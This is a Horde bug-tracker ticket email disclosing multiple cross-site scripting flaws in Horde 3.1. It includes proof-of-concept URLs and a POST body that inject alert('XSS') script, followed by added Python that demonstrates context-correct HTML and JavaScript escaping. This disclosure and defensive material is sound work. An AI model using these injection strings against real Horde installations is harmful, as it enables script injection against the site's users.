[Tickets #8399] Multiple Cross Site Scripting Vulnerabilities
bugs at horde.org
Fri Jul 3 18:48:49 UTC 2009
DO NOT REPLY TO THIS MESSAGE. THIS EMAIL ADDRESS IS NOT MONITORED.
Ticket URL: http://bugs.horde.org/ticket/8399
------------------------------------------------------------------------------
Ticket | 8399
Created By | security at davidwharton.us
Summary | Multiple Cross Site Scripting Vulnerabilities
Queue | Horde Base
Version | 3.1
Type | Bug
State | Unconfirmed
Priority | 2. Medium
Milestone |
Patch |
Owners |
------------------------------------------------------------------------------
security at davidwharton.us (2009-07-03 14:48) wrote:
Multiple cross site scripting vulnerabilities exist. Proof of concepts:
http://hordeserver.com/horde/services/images/colorpicker.php?form=//--><script>alert('XSS')</script>
https://hordeserver.com/horde/services/images/colorpicker.php?form=prefs&target=color"];%0d}%0dalert('XSS');%0dfunction%20juice()%20{%0dparent.opener.document.prefs["
https://hordeserver.com/horde/test.php?mode=extensions&ext=<script>alert('XSS')</script>
POST to http://hordeserver.com/horde/services/prefs.php with the
following content:
actionID=update_prefs&group=display&app=horde&initial_application=horde&theme=azur&summary_refresh_time=0&show_sidebar=on&sidebar_width=1337//-->%0d%<script>alert('XSS')</script>//&menu_view=text&menu_refresh_time=0&widget_accesskey=on
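The proofs of concept above exercise two injection contexts: plain HTML (the test.php ext parameter) and an inline JavaScript string (the colorpicker.php form and target parameters and the prefs sidebar_width field, where the payload either closes the string literal with "]; or terminates the <!-- ... //--> comment wrapper and opens a new script tag). The Python below is an added example and is not Horde code or anything from the reporter: it models hypothetical templates that splice a request parameter into each context, applies the escaping appropriate to that context, and checks that the payloads quoted in this ticket can no longer close the literal or inject a script tag. The template strings, function names and the quote-counting check are assumptions for illustration only.

```python
import html
import json

# Payloads copied from the PoC URLs in this ticket, URL-decoded (%0d is \r).
# Constructed test input; nothing here contacts a Horde server.
FORM_PAYLOAD = "//--><script>alert('XSS')</script>"
TARGET_PAYLOAD = ("color\"];\r}\ralert('XSS');\rfunction juice() {\r"
                  "parent.opener.document.prefs[\"")
EXT_PAYLOAD = "<script>alert('XSS')</script>"

# Hypothetical vulnerable templates (assumed for illustration; not Horde's source).
SCRIPT_OPEN = '<script type="text/javascript"><!--\n'
SCRIPT_CLOSE = '\n//--></script>'


def render_js_unsafe(form, target):
    """Splice request parameters straight into string literals in an inline script."""
    return (SCRIPT_OPEN
            + 'var formName = "' + form + '";\n'
            + 'var targetField = "' + target + '";'
            + SCRIPT_CLOSE)


def render_html_unsafe(ext):
    """Echo a request parameter into HTML text without escaping."""
    return '<li>Extension: ' + ext + '</li>'


def js_string(value):
    """Encode value as a JS string literal that is safe inside <script>...</script>.

    json.dumps escapes quotes, backslashes and control characters (\\r, \\n) but
    leaves < > & alone, so '</script>' or '-->' could still appear verbatim in
    the page; encode those as \\uXXXX, which the JS lexer reads back unchanged.
    """
    s = json.dumps(value)
    return (s.replace('<', '\\u003c')
             .replace('>', '\\u003e')
             .replace('&', '\\u0026'))


def render_js_safe(form, target):
    """Same template as render_js_unsafe, with context-correct encoding."""
    return (SCRIPT_OPEN
            + 'var formName = ' + js_string(form) + ';\n'
            + 'var targetField = ' + js_string(target) + ';'
            + SCRIPT_CLOSE)


def render_html_safe(ext):
    """Same template as render_html_unsafe, with HTML entity escaping."""
    return '<li>Extension: ' + html.escape(ext, quote=True) + '</li>'


def count_script_tags(page):
    """Number of '<script' openers; the JS template legitimately contains one."""
    return page.lower().count('<script')


def unescaped_quotes(js):
    """Count '"' characters that are not part of a backslash escape (JS lexer view)."""
    n, i = 0, 0
    while i < len(js):
        if js[i] == '\\':
            i += 2          # skip the escaped character
            continue
        if js[i] == '"':
            n += 1
        i += 1
    return n


def js_context_broken(page):
    """True if the input closed a string literal or injected an extra script tag."""
    body = page[len(SCRIPT_OPEN):-len(SCRIPT_CLOSE)]
    expected_quotes = 4   # two declarations, two delimiting quotes each
    return unescaped_quotes(body) != expected_quotes or count_script_tags(page) != 1


def roundtrips(value):
    """The encoded literal must still decode to the original value."""
    return json.loads(js_string(value)) == value


if __name__ == '__main__':
    print(js_context_broken(render_js_unsafe(FORM_PAYLOAD, TARGET_PAYLOAD)))  # True
    print(js_context_broken(render_js_safe(FORM_PAYLOAD, TARGET_PAYLOAD)))    # False
    print(count_script_tags(render_html_unsafe(EXT_PAYLOAD)))                 # 1
    print(count_script_tags(render_html_safe(EXT_PAYLOAD)))                   # 0
```

The point of the two encoders is that escaping must match the context the value lands in: html.escape alone does nothing for a value inside a JavaScript string (a bare " or \r still ends the literal), and json.dumps alone still lets </script> or --> terminate the block, so the JS encoder does both.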